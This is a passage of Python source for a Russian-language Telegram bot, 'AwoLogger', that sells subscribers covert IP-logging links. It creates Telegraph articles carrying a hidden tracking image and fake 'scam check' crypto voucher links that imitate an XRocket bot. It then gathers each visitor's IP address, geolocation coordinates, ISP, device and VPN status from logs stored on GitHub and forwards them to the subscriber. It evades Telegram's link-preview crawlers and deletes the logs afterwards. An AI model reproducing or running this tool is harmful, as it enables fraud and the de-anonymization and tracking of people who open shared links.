        }
        await save_checks()
        
        markup = InlineKeyboardMarkup()
        markup.add(InlineKeyboardButton("💶 Скам чек", url=f"https://t.me/XrocketttttttRobot?start={check_id}"))
        markup.add(InlineKeyboardButton("◀️ Назад", callback_data="xrocket_logger"))
        
        bot.edit_message_text(
            f"""
<b>📜 Чек успешно создан!</b>
<b>🔥 Заголовок:</b> <i>{user_data[str(user_id)]['title']}</i>
<b>🔥 Текст:</b> <i>{user_data[str(user_id)]['text'][:100]}{'...' if len(user_data[str(user_id)]['text']) > 100 else ''}</i>
<b>🔗 Ссылка:</b> <i>{tg_url}</i>
<b>💳 Сумма:</b> <i>{user_data[str(user_id)]['check_amount']:.1f} USDT</i>
""",
            chat_id, msg_id, parse_mode="HTML", reply_markup=markup
        )
        
        if 'pages' not in user_data[str(user_id)]:
            user_data[str(user_id)]['pages'] = []
        user_data[str(user_id)]['pages'].append({
            'title': user_data[str(user_id)]['title'],
            'url': tg_url,
            'created_at': datetime.now().isoformat()
        })
        await save_users()
    
    except Exception as e:
        logger.error(f"Error creating check page: {e}")
        bot.edit_message_text(
            f"<b>🔴 Ошибка при создании чека:</b> <i>{str(e)}</i>",
            chat_id, msg_id, parse_mode="HTML"
        )

def get_title(message):
    user_id = message.from_user.id
    if str(user_id) not in user_data or user_data[str(user_id)]['type'] != 'telegraph':
        return
    
    user_data[str(user_id)]['title'] = message.text
    bot.delete_message(message.chat.id, message.message_id)
    bot.edit_message_text(
        "<b>📝 Введите текст статьи:</b>",
        message.chat.id, user_data[str(user_id)]['msg_id'], parse_mode="HTML"
    )
    asyncio.run(save_users())
    bot.register_next_step_handler_by_chat_id(message.chat.id, get_text)

def get_text(message):
    user_id = message.from_user.id
    if str(user_id) not in user_data or user_data[str(user_id)]['type'] != 'telegraph':
        return
    
    user_data[str(user_id)]['text'] = message.text
    bot.delete_message(message.chat.id, message.message_id)
    bot.edit_message_text(
        "<b>⏳ Создаю статью...</b>",
        message.chat.id, user_data[str(user_id)]['msg_id'], parse_mode="HTML"
    )
    asyncio.run(save_users())
    asyncio.run(create_telegraph_page(message.chat.id, user_id, user_data[str(user_id)]['msg_id']))

async def create_telegraph_page(chat_id, user_id, msg_id):
    try:
        async with aiohttp.ClientSession() as session:
            async with session.get("https://awo-logger.vercel.app/api/v1") as resp:
                if resp.status != 200:
                    bot.edit_message_text(
                        "<b>❌ Ошибка при получении изображения!</b>",
                        chat_id, msg_id, parse_mode="HTML"
                    )
                    return
                img_data = await resp.json()
                image_url = img_data.get('url')
                if not image_url:
                    bot.edit_message_text(
                        "<b>❌ Не удалось получить URL изображения!</b>",
                        chat_id, msg_id, parse_mode="HTML"
                    )
                    return
                path_match = re.search(r'/api/v2/(.+)', image_url)
                user_data[str(user_id)]['image_path'] = path_match.group(1) if path_match else image_url.split("/")[-1]

        content = f'<img src="{image_url}"><br>{user_data[str(user_id)]["text"]}'
        response = telegraph.create_page(
            title=user_data[str(user_id)]['title'],
            html_content=content,
            author_name="@AwoLoggerBot",
            author_url="https://t.me/AwoLoggerBot"
        )
        
        tg_url = f"https://telegra.ph/{response['path']}"
        user_data[str(user_id)]['telegraph_url'] = tg_url
        if 'pages' not in user_data[str(user_id)]:
            user_data[str(user_id)]['pages'] = []
        user_data[str(user_id)]['pages'].append({
            'title': user_data[str(user_id)]['title'],
            'url': tg_url,
            'created_at': datetime.now().isoformat()
        })
        await save_users()

        markup = InlineKeyboardMarkup()
        markup.add(InlineKeyboardButton("🔗 Перейти к статье", url=tg_url))
        markup.add(InlineKeyboardButton("🔙 Назад", callback_data="telegraph_logger"))
        
        bot.edit_message_text(
            f"""
<b>📜 Статья успешно создана!</b>
<b>🔥 Заголовок:</b> <i>{user_data[str(user_id)]['title']}</i>
<b>🔥 Текст:</b> <i>{user_data[str(user_id)]['text'][:100]}{'...' if len(user_data[str(user_id)]['text']) > 100 else ''}</i>
<b>🔗 Ссылка:</b> <i>{tg_url}</i>
""",
            chat_id, msg_id, parse_mode="HTML", reply_markup=markup
        )
    
    except Exception as e:
        logger.error(f"Error creating Telegraph page: {e}")
        bot.edit_message_text(
            f"<b>🔴 Ошибка при создании статьи:</b> <i>{str(e)}</i>",
            chat_id, msg_id, parse_mode="HTML"
        )

def admin_give_sub(message):
    if message.from_user.id not in ADMIN_IDS:
        return
    
    try:
        target_id, days = map(int, message.text.split())
        expire_date = datetime.now() + timedelta(days=days)
        subscriptions[str(target_id)] = expire_date.isoformat()
        asyncio.run(save_subs())
        
        bot.send_message(
            message.chat.id,
            f"<b>✅ Подписка выдана:</b> <i>ID {target_id} на {days} дней (до {expire_date.strftime('%Y-%m-%d')})</i>",
            parse_mode="HTML"
        )
        try:
            bot.send_message(
                target_id,
                f"<b>🎉 Вам выдана подписка на {days} дней!</b> <i>Действует до {expire_date.strftime('%Y-%m-%d')}</i>",
                parse_mode="HTML"
            )
        except:
            pass
    
    except ValueError:
        bot.send_message(
            message.chat.id,
            "<b>❌ Неверный формат!</b> <i>Используйте:</i> <code>123456789 30</code>",
            parse_mode="HTML"
        )

def admin_revoke_sub(message):
    if message.from_user.id not in ADMIN_IDS:
        return
    
    try:
        target_id = str(int(message.text))
        if target_id in subscriptions:
            del subscriptions[target_id]
            asyncio.run(save_subs())
            bot.send_message(
                message.chat.id,
                f"<b>✅ Подписка отменена для ID:</b> <i>{target_id}</i>",
                parse_mode="HTML"
            )
            try:
                bot.send_message(
                    int(target_id),
                    "<b>❌ Ваша подписка была отменена администратором.</b>",
                    parse_mode="HTML"
                )
            except:
                pass
        else:
            bot.send_message(
                message.chat.id,
                f"<b>❌ У пользователя {target_id} нет активной подписки.</b>",
                parse_mode="HTML"
            )
    
    except ValueError:
        bot.send_message(
            message.chat.id,
            "<b>❌ Неверный формат!</b> <i>Введите ID пользователя (только цифры).</i>",
            parse_mode="HTML"
        )

@retry(stop=stop_after_attempt(3), wait=wait_fixed(2))
async def delete_github_file(file_path, commit_message="Remove processed log"):
    try:
        headers = {'Authorization': f'token {GITHUB_TOKEN}'}
        repo = "Awologger/Awologger"
        api_url = f"https://api.github.com/repos/{repo}/contents/{file_path}"
        
        async with aiohttp.ClientSession() as session:
            sha = file_sha_cache.get(file_path)
            if not sha:
                async with session.get(api_url, headers=headers) as resp:
                    if resp.status != 200:
                        logger.error(f"Failed to get file SHA for {file_path}: {resp.status}")
                        return False
                    file_data = await resp.json()
                    sha = file_data.get('sha')
                    file_sha_cache[file_path] = sha
            
            payload = {
                "message": commit_message,
                "sha": sha
            }
            async with session.delete(api_url, headers=headers, json=payload) as resp:
                if resp.status == 200:
                    logger.info(f"Successfully deleted {file_path} from GitHub")
                    file_sha_cache.pop(file_path, None)
                    return True
                else:
                    logger.error(f"Failed to delete {file_path}: {resp.status}")
                    return False
    except Exception as e:
        logger.error(f"Error deleting GitHub file {file_path}: {e}")
        return False

async def format_log_info(data):
    try:
        network_data = data.get('network', {})
        isp = network_data.get('isp', '').lower()
        org = network_data.get('org', '').lower()
        as_number = network_data.get('as', '')
        if 'telegram' in isp or 'telegram' in org or as_number == 'AS62041':
            logger.info("Skipping Telegram-related log")
            return ""

        ip_data = data.get('ip', {})
        location_data = data.get('location', {})
        req_data = data.get('request', {})
        device_data = data.get('device', {})
        
        timestamp = data.get('timestamp', 'Unknown').split('.')[0]
        timezone = location_data.get('timezone', 'Unknown')
        ip_client = ip_data.get('client', 'Unknown')
        ipv4 = ip_data.get('ipv4', 'Unknown')
        country = location_data.get('country', {}).get('name', 'Unknown')
        city = location_data.get('city', 'Unknown')
        url = req_data.get('url', '#')
        user_agent = req_data.get('userAgent', 'Unknown')
        device_type = device_data.get('type', 'Unknown')
        os = f"{device_data.get('os', {}).get('name', 'Unknown')} {device_data.get('os', {}).get('version', '')}".strip()
        browser = f"{device_data.get('browser', {}).get('name', 'Unknown')} {device_data.get('browser', {}).get('version', '')}".strip()

        if 'TelegramBot' in user_agent:
            logger.info("Skipping TelegramBot log")
            return ""

        vpn_data = data.get('vpn', {})
        sec_data = data.get('security', {})
        behavior_data = data.get('behavior', {})
        time_data = behavior_data.get('time', {})
        time_category = time_data.get('category', 'Unknown')
        time_day = time_data.get('day', 'Unknown')
        ipv6 = ip_data.get('ipv6', 'Не обнаружен')
        whois = ip_data.get('whois', 'Whois')
        ports = ip_data.get('ports', {})
        port_source = ports.get('source', 'Unknown')
        port_dest = ports.get('destination', 'Unknown')
        port80_status = ports.get('port80', 'Unknown')
        port443_status = ports.get('port443', 'Unknown')
        dns_data = ip_data.get('dns', {})
        dns_hostname = dns_data.get('hostname', 'Unknown')
        dns_reverse = dns_data.get('reverse', 'Unknown')
        continent = location_data.get('continent', {}).get('name', 'Unknown')
        country_code = location_data.get('country', {}).get('code', 'Unknown')
        region = location_data.get('region', {}).get('name', 'Unknown')
        zip_code = location_data.get('zip', 'Unknown')
        coordinates = location_data.get('coordinates', {})
        latitude = coordinates.get('latitude', 'Unknown')
        longitude = coordinates.get('longitude', 'Unknown')
        map_url = location_data.get('mapUrl', 'Карта')
        currency = f"{location_data.get('country', {}).get('currency', {}).get('symbol', 'Unknown')} ({location_data.get('country', {}).get('currency', {}).get('name', 'Unknown')})"
        isp = network_data.get('isp', 'Unknown')
        org = network_data.get('org', '')
        as_number = network_data.get('as', 'Unknown')
        path = req_data.get('path', 'Unknown')
        referer = req_data.get('referer', {}).get('url', 'Неизвестно')
        accept_language = req_data.get('acceptLanguage', 'Unknown')
        content = req_data.get('content', {})
        content_type = content.get('type', '∅')
        content_data = content.get('data', '∅')
        vpn_status = vpn_data.get('status', 'Unknown')
        vpn_confidence = vpn_data.get('confidence', 0)
        vpn_provider = vpn_data.get('provider', 'Unknown')
        https = sec_data.get('https', False)
        connection_type = network_data.get('connection', {}).get('type', 'Unknown')
        dnt = req_data.get('dnt', '0') == '1'
        mobile = device_data.get('mobile', False)
        language = behavior_data.get('language', {}).get('primary', 'Unknown')
        architecture = device_data.get('cpu', {}).get('architecture', 'Unknown')

        msg = f"""
<b>🔍 Время запроса:</b> <i>{timestamp}</i>
├─ <b>Категория:</b> <i>{time_category}, {time_day}</i>
└─ <b>Часовой пояс:</b> <i>{timezone}</i>

<b>🔍 IP информация:</b>
├─ <b>Клиент:</b> <i>{ip_client}</i>
├─ <b>IPv4:</b> <i>{ipv4}</i>
├─ <b>IPv6:</b> <i>{ipv6}</i>
├─ <b>Порты:</b> 🔌 <i>{port_source} → {port_dest}</i>
├─ <b>Порт 80:</b> <i>{'❌ закрыт' if port80_status == 'закрыт' else '✅ открыт'}</i>
├─ <b>Порт 443:</b> <i>{'❌ закрыт' if port443_status == 'закрыт' else '✅ открыт'}</i>
├─ <b>Whois:</b> <a href="{whois}">Whois</a>
└─ <b>Сеть:</b>
   ├─ <b>DNS:</b> <i>{dns_hostname}</i>
   ├─ <b>Обратный DNS:</b> <i>{dns_reverse}</i>
   ├─ <b>Провайдер:</b> <i>{isp}</i>
   ├─ <b>AS:</b> <i>{as_number}</i>
   └─ <b>Организация:</b> <i>{org}</i>

<b>📍 Геолокация:</b>
├─ <b>Континент:</b> <i>{continent}</i>
├─ <b>Страна:</b> <i>{country_code} ({country})</i>
├─ <b>Регион:</b> <i>{region}</i>
├─ <b>Город:</b> <i>{city}</i>
├─ <b>Индекс:</b> <i>{zip_code}</i>
├─ <b>Координаты:</b> <i>{latitude}, {longitude}</i>
├─ <b>Карта:</b> <a href="{map_url}">Карта</a>
└─ <b>Валюта:</b> <i>{currency}</i>

<b>🔗 HTTP запрос:</b>
├─ <b>User Agent:</b> <i>{user_agent}</i>
├─ <b>Язык:</b> <i>{accept_language}</i>
└─ <b>Контент:</b>
   ├─ <b>Тип:</b> <i>{content_type}</i>
   └─ <b>Данные:</b> <i>{content_data}</i>

<b>🔒 VPN:</b>
├─ <b>Статус:</b> <i>{vpn_status}</i>
└─ <b>Провайдер:</b> <i>{vpn_provider}</i>

<b>📱 Устройство:</b>
├─ <b>Тип:</b> <i>{device_type}</i>
├─ <b>ОС:</b> <i>{os}</i>
├─ <b>Браузер:</b> <i>{browser}</i>
├─ <b>Мобильное:</b> <i>{'Да' if mobile else 'Нет'}</i>
└─ <b>Язык:</b> <i>{language}</i>

<b>🛡️ Безопасность:</b>
├─ <b>HTTPS:</b> <i>{'✅ HTTPS' if https else '❌ HTTP'}</i>
└─ <b>Соединение:</b> <i>{connection_type}</i>
"""
        return msg
    except Exception as e:
        logger.error(f"Error formatting log info: {e}")
        return ""

async def send_log_info(user_id, data, admin=False):
    logger.debug(f"Attempting to send log to user {user_id}, admin={admin}, has_subscription={check_subscription(user_id)}")
    
    if not admin and not can_view_logs(user_id):
        logger.info(f"User {user_id} exceeded log view limit")
        if str(user_id) not in limit_notified:
            markup = InlineKeyboardMarkup()
            markup.add(InlineKeyboardButton("💸 Купить подписку", callback_data="buy_sub"))
            try:
                bot.send_message(
                    user_id,
                    "<b>🔒 Лимит просмотра логов исчерпан!</b> <i>Купите подписку для неограниченного доступа.</i>",
                    parse_mode="HTML", reply_markup=markup
                )
                limit_notified.add(str(user_id))
            except Exception as e:
                logger.error(f"Failed to notify user {user_id} about limit: {e}")
        return
    
    try:
        msg = await format_log_info(data)
        if not msg:
            logger.info(f"Empty log message for user {user_id}, skipping")
            return
        bot.send_message(user_id, msg, parse_mode="HTML", disable_web_page_preview=True)
        if not admin and not check_subscription(user_id):
            view_logs[str(user_id)] = 1
            await save_view_logs()
            logger.info(f"Recorded log view for user {user_id}")
    
    except Exception as e:
        logger.error(f"Error sending log info to user {user_id}: {e}")

async def process_log_file(file, session, headers, content_hashes):
    try:
        name = file['name']
        if not name.endswith('.json'):
            logger.debug(f"Skipping non-JSON file: {name}")
            return
        
        raw_url = file['download_url']
        logger.info(f"Processing log file: {name}, URL: {raw_url}")
        
        async with session.get(raw_url, headers=headers) as log_resp:
            if log_resp.status != 200:
                logger.error(f"Failed to download log {raw_url}: {log_resp.status}")
                return
            log_text = await log_resp.text()
            content_hash = get_content_hash(log_text)
            if content_hash in content_hashes:
                logger.info(f"Skipping duplicate log {name} with hash {content_hash}")
                await delete_github_file(f"logs/{name}")
                return
            content_hashes.add(content_hash)
            
            try:
                log_data = json.loads(log_text)
                if not isinstance(log_data, dict):
                    logger.warning(f"Invalid log data in {name}: not a dictionary")
                    return
                request_data = log_data.get('request', {})
                if not isinstance(request_data, dict):
                    logger.warning(f"No request data in {name}")
                    return
                path = request_data.get('path', '').lstrip('/')
                if not path:
                    logger.warning(f"No path in {name}")
                    return
                
                logger.info(f"Log path: {path}")
                
                for uid, data in user_data.items():
                    image_path = data.get('image_path', '')
                    if not image_path:
                        logger.debug(f"No image_path for user {uid}")
                        continue
   
                    normalized_log_path = path.strip('/')
                    normalized_image_path = image_path.strip('/')
                    logger.debug(f"Comparing log path: {normalized_log_path} with user {uid} image_path: {normalized_image_path}")
                    
                    if normalized_image_path in normalized_log_path or normalized_log_path == normalized_image_path:
                        logger.info(f"Matched log for user {uid}: log_path={path}, image_path={image_path}")
                        log_id = generate_random_id(16)
                        
                        for existing_log_id, existing_log in link_data.items():
                            if (existing_log['user_id'] == uid and 
                                existing_log['url'] == data.get('telegraph_url', 'Неизвестно') and
                                existing_log['data']['timestamp'] == log_data.get('timestamp')):
                                logger.info(f"Skipping duplicate log for user {uid} with timestamp {log_data.get('timestamp')}")
                                await delete_github_file(f"logs/{name}")
                                return
                        
                        if log_id in link_data:
                            logger.info(f"Log {log_id} already processed")
                            return
                        
                        telegraph_url = data.get('telegraph_url', 'Неизвестно')
                        logger.info(f"Sending log info to user {uid} for URL: {telegraph_url}")
                        
                        await send_log_info(int(uid), log_data)
                        
                        link_data[log_id] = {
                            'user_id': uid,
                            'url': telegraph_url,
                            'timestamp': log_data.get('timestamp', datetime.now().isoformat()).split('.')[0],
                            'data': log_data
                        }
                        await save_link_data()
                        
                        file_path = f"logs/{name}"
                        logger.info(f"Deleting processed log file: {file_path}")
                        await delete_github_file(file_path)
                        return
                logger.warning(f"No matching user found for log path: {path}")
            except json.JSONDecodeError as e:
                logger.error(f"JSON decode error for {raw_url}: {e}")
            except Exception as e:
                logger.error(f"Error processing log {raw_url}: {e}", exc_info=True)
    except Exception as e:
        logger.error(f"Error in process_log_file for {file.get('name', 'unknown')}: {e}")

async def monitor_logs():
    content_hashes = set()
    while True:
        try:
            headers = {'Authorization': f'token {GITHUB_TOKEN}'} if GITHUB_TOKEN else {}
            logger.info("Fetching logs from GitHub")
            async with aiohttp.ClientSession() as session:
                async with session.get('https://api.github.com/repos/Awologger/Awologger/contents/logs', headers=headers) as resp:
                    logger.info(f"GitHub API response: status={resp.status}")
                    if resp.status != 200:
                        logger.error(f"Failed to fetch GitHub logs: {resp.status}")
                        await asyncio.sleep(5)
                        continue
                    rate_limit_remaining = int(resp.headers.get('X-RateLimit-Remaining', 5000))
                    logger.info(f"Rate limit remaining: {rate_limit_remaining}")
                    if rate_limit_remaining < GITHUB_RATE_LIMIT_THRESHOLD:
                        logger.warning(f"GitHub API rate limit low: {rate_limit_remaining} requests remains")
                        await asyncio.sleep(60)
                        continue
                    files = await resp.json()
                    logger.info(f"Found {len(files)} files")
                    tasks = []
                    for file in files:
                        if not isinstance(file, dict) or 'name' not in file:
                            logger.warning("Invalid file entry in GitHub response")
                            continue
                        name = file['name']
                        logger.info(f"Processing file: {name}")
                        if name.endswith('.md'):
                            logger.info(f"Deleting .md file: {name}")
                            tasks.append(delete_github_file(f"logs/{name}", commit_message=f"Remove .md file {name}"))
                        elif name.endswith('.json') and 'download_url' in file:
                            tasks.append(process_log_file(file, session, headers, content_hashes))
                    if tasks:
                        logger.info(f"Processing {len(tasks)} log files")
                        await asyncio.gather(*tasks, return_exceptions=True)
                    else:
                        logger.info("No log files to process")
        except Exception as e:
            logger.error(f"Monitor logs error: {e}", exc_info=True)
        await asyncio.sleep(2)        

def admin_add_discount(message):
    if message.from_user.id not in ADMIN_IDS:
        return
    try:
        date_str, percent_str = message.text.split()
        percent = int(percent_str)
        if percent <= 0 or percent > 100:
            raise ValueError("Процент должен быть от 1 до 100")
        
        end_date = datetime.strptime(date_str, '%d.%m.%y:%H:%M')
        if end_date <= datetime.now():
            raise ValueError("Дата окончания должна быть в будущем")
        
        discount_id = generate_random_id(8)
        discounts[discount_id] = {
            'end_date': end_date.isoformat(),
            'percent': percent
        }
        asyncio.run(save_discounts())
        
        bot.send_message(
            message.chat.id,
            f"<b>✅ Скидка добавлена!</b>\n"
            f"🔖 <b>ID:</b> <i>{discount_id}</i>\n"
            f"├─ <b>Процент:</b> <i>{percent}%</i>\n"
            f"└─ <b>До:</b> <i>{date_str}</i>",
            parse_mode="HTML"
        )
    except ValueError as e:
        bot.send_message(
            message.chat.id,
            f"<b>❌ Ошибка:</b> <i>{str(e) if str(e) else 'Неверный формат! Используйте: 24.04.25:20:00 20'}</i>",
            parse_mode="HTML"
        )

def admin_remove_discount(message):
    if message.from_user.id not in ADMIN_IDS:
        return
    if not discounts:
        bot.send_message(
            message.chat.id,
            "<b>❌ Нет активных скидок для удаления!</b>",
            parse_mode="HTML"
        )
        return
    try:
        discount_id = message.text.strip()
        if discount_id not in discounts:
            raise ValueError("Скидка с таким ID не найдена")
        
        end_date = datetime.fromisoformat(discounts[discount_id]['end_date']).strftime('%d.%m.%y %H:%M')
        markup = InlineKeyboardMarkup()
        markup.add(
            InlineKeyboardButton("✅ Подтвердить", callback_data=f"confirm_remove_discount_{discount_id}"),
            InlineKeyboardButton("❌ Отменить", callback_data="discounts_menu")
        )
        
        bot.send_message(
            message.chat.id,
            f"<b>🗑 Подтвердите удаление скидки:</b>\n"
            f"🔖 <b>ID:</b> <i>{discount_id}</i>\n"
            f"├─ <b>Процент:</b> <i>{discounts[discount_id]['percent']}%</i>\n"
            f"└─ <b>До:</b> <i>{end_date}</i>",
            parse_mode="HTML",
            reply_markup=markup
        )
    except ValueError as e:
        text = "<b>🗑 Выберите скидку для удаления:</b>\n\n"
        for discount_id, data in discounts.items():
            end_date = datetime.fromisoformat(data['end_date']).strftime('%d.%m.%y %H:%M')
            text += f"🔖 <b>ID: {discount_id}</b>\n" \
                    f"   ├─ <b>Процент:</b> <i>{data['percent']}%</i>\n" \
                    f"   └─ <b>До:</b> <i>{end_date}</i>\n\n"
        text += "<i>Введите ID скидки для удаления.</i>"
        bot.send_message(
            message.chat.id,
            text,
            parse_mode="HTML"
        )

def confirm_remove_discount(discount_id, chat_id, message_id):
    if discount_id not in discounts:
        bot.edit_message_text(
            "<b>❌ Скидка уже удалена или не существует!</b>",
            chat_id, message_id, parse_mode="HTML", reply_markup=create_back_button("discounts_menu")
        )
        return
    percent = discounts[discount_id]['percent']
    end_date = datetime.fromisoformat(discounts[discount_id]['end_date']).strftime('%d.%m.%y %H:%M')
    del discounts[discount_id]
    asyncio.run(save_discounts())
    bot.edit_message_text(
        f"<b>✅ Скидка удалена!</b>\n"
        f"🔖 <b>ID:</b> <i>{discount_id}</i>\n"
        f"├─ <b>Процент:</b> <i>{percent}%</i>\n"
        f"└─ <b>Была до:</b> <i>{end_date}</i>",
        chat_id, message_id, parse_mode="HTML", reply_markup=create_back_button("discounts_menu")
    )

@retry(stop=stop_after_attempt(3), wait=wait_fixed(2))
async def check_invoice_status(invoice_id):
    try:
        async with aiohttp.ClientSession() as session:
            url = f"https://pay.crypt.bot/api/getInvoices?invoice_ids={invoice_id}"
            headers = {"Crypto-Pay-API-Token": CRYPTO_BOT_TOKEN}
            async with session.get(url, headers=headers) as resp:
                if resp.status != 200:
                    logger.error(f"Failed to check invoice {invoice_id}: {resp.status}")
                    return "unknown", 0, "unknown"
                data = await resp.json()
                invoice = data.get('result', {}).get('items', [{}])[0]
                status = invoice.get('status', 'unknown')
                amount = invoice.get('amount', 0)
                currency = invoice.get('asset', 'unknown')
                return status, amount, currency
    except Exception as e:
        logger.error(f"Error checking invoice {invoice_id}: {e}")
        return "unknown", 0, "unknown"

async def start_monitoring():
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    loop.run_until_complete(asyncio.gather(monitor_logs(), check_discounts()))

async def start_monitoring():
    tasks = [
        monitor_logs(),
        check_discounts()
    ]
    try:
        await asyncio.gather(*tasks, return_exceptions=True)
    except asyncio.CancelledError:
        logger.info("Monitoring tasks cancelled, shutting down...")
        for task in asyncio.all_tasks():
            task.cancel()
        await asyncio.gather(*asyncio.all_tasks(), return_exceptions=True)

def run_monitoring():
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    try:
        loop.run_until_complete(start_monitoring())
    except KeyboardInterrupt:
        logger.info("Received shutdown signal, cancelling tasks...")
        tasks = [task for task in asyncio.all_tasks(loop) if task is not asyncio.current_task(loop)]
        for task in tasks:
            task.cancel()
        loop.run_until_complete(loop.shutdown_asyncgens())
        loop.run_until_complete(loop.shutdown_default_executor())
    except Exception as e:
        logger.error(f"Error in monitoring thread: {e}")
    finally:
        loop.run_until_complete(loop.shutdown_asyncgens())
        loop.run_until_complete(loop.shutdown_default_executor())
        loop.close()
        logger.info("Monitoring thread event loop closed")

def main():
    monitor_thread = threading.Thread(target=run_monitoring, daemon=True)
    monitor_thread.start()
    logger.info("🚀 Bot started!")
    bot.infinity_polling(timeout=60, long_polling_timeout=30)

if __name__ == "__main__":
    main()